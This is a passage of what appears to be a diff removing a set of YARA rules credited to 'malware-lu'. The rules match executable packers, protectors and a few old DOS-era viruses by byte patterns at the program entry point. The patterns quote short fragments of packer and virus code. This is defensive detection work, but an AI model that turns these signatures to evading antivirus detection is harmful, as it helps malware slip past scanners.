-		$a0 = { 60 E8 00 00 00 00 5D 81 ED DE 26 40 00 8B BD 05 28 40 00 8B 8D 0D 28 40 00 B8 25 28 40 00 01 E8 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 09 28 40 00 31 C0 51 31 C9 66 B9 F7 00 66 83 F9 00 74 49 8B 57 0C 03 95 09 28 40 00 8B 85 11 28 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 89 CE E8 27 00 00 00 89 C1 5F B8 25 28 40 00 01 E8 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 01 28 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ActiveMARK5xTrymediaSystemsInc
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 20 2D 2D 4D 50 52 4D 4D 47 56 41 2D 2D 00 75 73 65 72 33 32 2E 64 6C 6C 00 4D 65 73 73 61 67 65 42 6F 78 41 00 54 68 69 73 20 61 70 70 6C 69 63 61 74 69 6F 6E 20 63 61 6E 6E 6F 74 20 72 75 6E 20 77 69 74 68 20 61 6E 20 61 63 74 69 76 65 20 64 65 62 75 67 }
-
-condition:
-		$a0
-}
-	
-	
-rule RCryptorv20HideEPVaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 DC 20 ?? 00 F7 D1 83 F1 FF E8 00 00 00 00 F7 D1 83 F1 FF C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov172v173
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 E8 C1 ?? ?? 68 F4 86 ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AsCryptv01SToRM2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 83 ?? ?? E2 }
-
-condition:
-		$a0
-}
-	
-	
-rule AsCryptv01SToRM3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 51 ?? ?? ?? 01 00 00 00 83 ?? ?? E2 }
-
-condition:
-		$a0
-}
-	
-	
-rule ASProtectV2XDLLAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AsCryptv01SToRM4
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 E2 }
-
-condition:
-		$a0
-}
-	
-	
-rule yzpack20UsAr
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 25 ?? ?? ?? ?? 61 87 CC 55 45 45 55 81 ED CA 00 00 00 55 A4 B3 02 FF 14 24 73 F8 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 1F B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3C AA EB DC FF 54 24 04 2B CB 75 0F FF 54 24 08 EB 27 AC D1 E8 74 30 13 C9 EB 1B 91 48 C1 E0 08 AC FF 54 24 08 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 99 BD ?? ?? ?? ?? FF 65 28 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PasswordprotectormySMT
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? 5D 8B FD 81 ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? 83 ?? ?? 89 ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 46 80 ?? ?? 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ObsidiumV1258V133XObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 ?? E8 ?? 00 00 00 EB 02 ?? ?? EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ReflexiveArcadeWrapper
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 98 68 42 00 68 14 FA 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 F8 50 42 00 33 D2 8A D4 89 15 3C E8 42 00 8B C8 81 E1 FF 00 00 00 89 0D 38 E8 42 00 C1 E1 08 03 CA 89 0D 34 E8 42 00 C1 E8 10 A3 30 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxTrojanTelefoon
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 1E E8 3B 01 BF CC 01 2E 03 3E CA 01 2E C7 05 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv030betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 30 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxACMEClonewarMutant
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC AD 3D FF FF 74 20 E6 42 8A C4 E6 42 E4 61 0C 03 E6 61 AD B9 40 1F E2 FE }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov2xxCopyMemII
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A ?? 8B B5 ?? ?? ?? ?? C1 E6 04 8B 85 ?? ?? ?? ?? 25 07 ?? ?? 80 79 05 48 83 C8 F8 40 33 C9 8A 88 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 81 E2 07 ?? ?? 80 79 05 4A 83 CA F8 42 33 C0 8A 82 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule TPACKv05cm1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? FD 60 BE ?? ?? BF ?? ?? B9 ?? ?? F3 A4 8B F7 BF ?? ?? FC 46 E9 8E FE }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEStealthv271
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED B0 27 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule TPACKv05cm2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? FD 60 BE ?? ?? BF ?? ?? B9 ?? ?? F3 A4 8B F7 BF ?? ?? FC 46 E9 CE FD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeJoiner10Yodaf2f
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 68 04 11 40 00 6A 00 E8 1A 03 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 68 04 11 40 00 E8 EC 02 00 00 83 F8 FF 0F 84 83 02 00 00 A3 08 12 40 00 6A 00 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv101bAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MacromediaWindowsFlashProjectorPlayerv30
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC 44 56 FF 15 94 13 42 00 8B F0 B1 22 8A 06 3A C1 75 13 8A 46 01 46 3A C1 74 04 84 C0 75 F4 38 0E 75 0D 46 EB 0A 3C 20 7E 06 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PESpinV11cyberbob
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPack118aPlib043ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 BD 0A 04 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 A7 03 00 00 89 85 16 04 00 00 5B FF B5 16 04 00 00 56 FF D3 83 C4 ?? 8B B5 16 04 00 00 8B C6 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DotFixNiceProtectvna
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 55 00 00 00 8D BD 00 10 40 00 68 ?? ?? ?? 00 03 3C 24 8B F7 90 68 31 10 40 00 9B DB E3 55 DB 04 24 8B C7 DB 44 24 04 DE C1 DB 1C 24 8B 1C 24 66 AD 51 DB 04 24 90 90 DA 8D 77 10 40 00 DB 1C 24 D1 E1 29 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv032betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 32 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PackItBitch10archphase
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 28 ?? ?? ?? 35 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 41 ?? ?? ?? 50 ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? ?? ?? 79 ?? ?? ?? 7D ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule JDPack2xJDPack
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 68 51 40 00 68 04 25 40 00 64 A1 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RPolyCryptv10personalpolycryptorsignfrompinch
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 58 97 97 60 61 8B 04 24 80 78 F3 6A E8 00 00 00 00 58 E8 00 00 00 00 58 91 91 EB 00 0F 85 6B F4 76 6F E8 00 00 00 00 83 C4 04 E8 00 00 00 00 58 90 E8 00 00 00 00 83 C4 04 8B 04 24 80 78 F1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv031betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 31 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Packmanv0001
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 58 8D A8 ?? ?? FF FF 8D 98 ?? ?? ?? FF 8D ?? ?? 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01PEPack099Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 11 00 00 00 5D 83 ED 06 80 BD E0 04 90 90 01 0F 84 F2 FF CC 0A E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor239minimumprotection
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? E9 ?? ?? ?? FF 50 C1 C8 18 89 05 ?? ?? ?? ?? C3 C1 C0 18 51 E9 ?? ?? ?? FF 84 C0 0F 84 6A F9 FF FF E9 ?? ?? ?? FF C3 E9 ?? ?? ?? FF E8 CF E9 FF FF B8 01 00 00 00 E9 ?? ?? ?? FF 2B D0 68 A0 36 80 D4 59 81 C9 64 98 FF 99 E9 ?? ?? ?? FF 84 C0 0F 84 8E EC FF FF E9 ?? ?? ?? FF C3 87 3C 24 5F 8B 00 03 45 FC 83 C0 18 E9 ?? ?? ?? FF 87 0C 24 59 B8 01 00 00 00 D3 E0 23 D0 E9 02 18 00 00 0F 8D DB 00 00 00 C1 E8 14 E9 CA 00 00 00 9D 87 0C 24 59 87 1C 24 68 AE 73 B9 96 E9 C5 10 00 00 0F 8A ?? ?? ?? ?? E9 ?? ?? ?? FF 81 FD F5 FF 8F 07 E9 4F 10 00 00 C3 E9 5E 12 00 00 87 3C 24 E9 ?? ?? ?? FF E8 ?? ?? ?? FF 83 3D ?? ?? ?? ?? 00 0F 85 ?? ?? ?? ?? 8D 55 EC B8 ?? ?? ?? ?? E9 ?? ?? ?? FF E8 A7 1A 00 00 E8 2A CB FF FF E9 ?? ?? ?? FF C3 E9 ?? ?? ?? FF 59 89 45 E0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtMicrosoftVisualC60ASM
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HaspdongleAlladin
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 53 51 52 57 56 8B 75 1C 8B 3E ?? ?? ?? ?? ?? 8B 5D 08 8A FB ?? ?? 03 5D 10 8B 45 0C 8B 4D 14 8B 55 18 80 FF 32 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SafeDiscv4
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 42 6F 47 5F }
-
-condition:
-		$a0
-}
-	
-	
-rule PKLITEv112v115v1201
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 73 ?? 2D ?? ?? FA 8E D0 FB 2D ?? ?? 8E C0 50 B9 ?? ?? 33 FF 57 BE ?? ?? FC F3 A5 CB B4 09 BA ?? ?? CD 21 CD 20 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITEv112v115v1202
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? BA ?? ?? 3B C4 73 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptorv153
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 ?? ?? 00 31 C0 89 41 14 89 41 18 80 A1 C1 00 00 00 FE C3 31 C0 64 FF 30 64 89 20 CC C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule MSLRHv032afakeEXE32Pack13xemadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC 56 3B D2 74 02 81 85 57 E8 00 00 00 00 3B DB 74 01 90 83 C4 14 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXpressorv11CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 15 13 00 00 E9 F0 12 00 00 E9 58 12 00 00 E9 AF 0C 00 00 E9 AE 02 00 00 E9 B4 0B 00 00 E9 E0 0C 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPackV11LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PrivatePersonalPackerPPPv102ConquestOfTroycom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 17 00 00 00 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxHorse1776
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5D 83 ?? ?? 06 1E 26 ?? ?? ?? ?? BF ?? ?? 1E 0E 1F 8B F7 01 EE B9 ?? ?? FC F3 A6 1F 1E 07 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEShit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DrWebVirusFindingEngineInSoftEDVSysteme
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 01 00 00 00 C2 0C 00 8D 80 00 00 00 00 8B D2 8B ?? 24 04 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PluginToExev100BoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 0D 40 40 00 6A 00 81 C3 ?? ?? ?? 00 FF D3 83 C4 10 FF 95 B0 40 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv15PrivateVaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NeoLitev200
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 44 24 04 23 05 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 FE 05 ?? ?? ?? ?? 0B C0 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITEv200bextra
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 02 00 72 ?? B4 09 BA ?? ?? CD 21 B8 01 4C CD 21 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EA ?? ?? ?? ?? F3 A5 C3 59 2D ?? ?? 8E D0 51 2D ?? ?? 50 80 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Crunch5Fusion4
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 15 03 ?? ?? ?? 06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 55 E8 }
-
-condition:
-		$a0
-}
-	
-	
-rule MSLRHv032afakePEBundle023xemadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEMangle
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C BE ?? ?? ?? ?? 8B FE B9 ?? ?? ?? ?? BB 44 52 4F 4C AD 33 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv302v302av304Relocationspack
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? BF ?? ?? B9 ?? ?? 8C CD 81 ED ?? ?? 8B DD 81 EB ?? ?? 8B D3 FC FA 1E 8E DB 01 15 33 C0 2E AC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXProtectorv10x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NorthStarPEShrinkerv13byLiuxingping
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 73 ?? FF FF 8B 06 83 F8 00 74 11 8D B5 7F ?? FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 4F ?? FF FF 2B D0 89 95 4F ?? FF FF 01 95 67 ?? FF FF 8D B5 83 ?? FF FF 01 }
-
-condition:
-		$a0
-}
-	
-	
-rule CodeCryptv015b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 31 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackFullEdition117Ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv100
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB C4 84 40 ?? 87 DD 8B 85 49 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakeASProtect10FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 01 00 00 00 90 5D 81 ED 00 00 00 00 BB 00 00 00 00 03 DD 2B 9D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule KGCryptvxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 64 A1 30 ?? ?? ?? 84 C0 74 ?? 64 A1 20 ?? ?? ?? 0B C0 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxKBDflags1024
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B EC 2E 89 2E 24 03 BC 00 04 8C D5 2E 89 2E 22 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule yodasProtectorV102AshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 23 3F 42 00 8B D5 81 C2 72 3F 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3A 66 42 00 81 E9 1D 40 42 00 8B D5 81 C2 1D 40 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 C3 1F 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1311ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01MicrosoftVisualC620Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 55 8B EC 83 EC 50 53 56 57 BE 90 90 90 90 8D 7D F4 A5 A5 66 A5 8B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MEGALITEv120a
-{
-      meta:
-		author="malware-lu"
-strings:
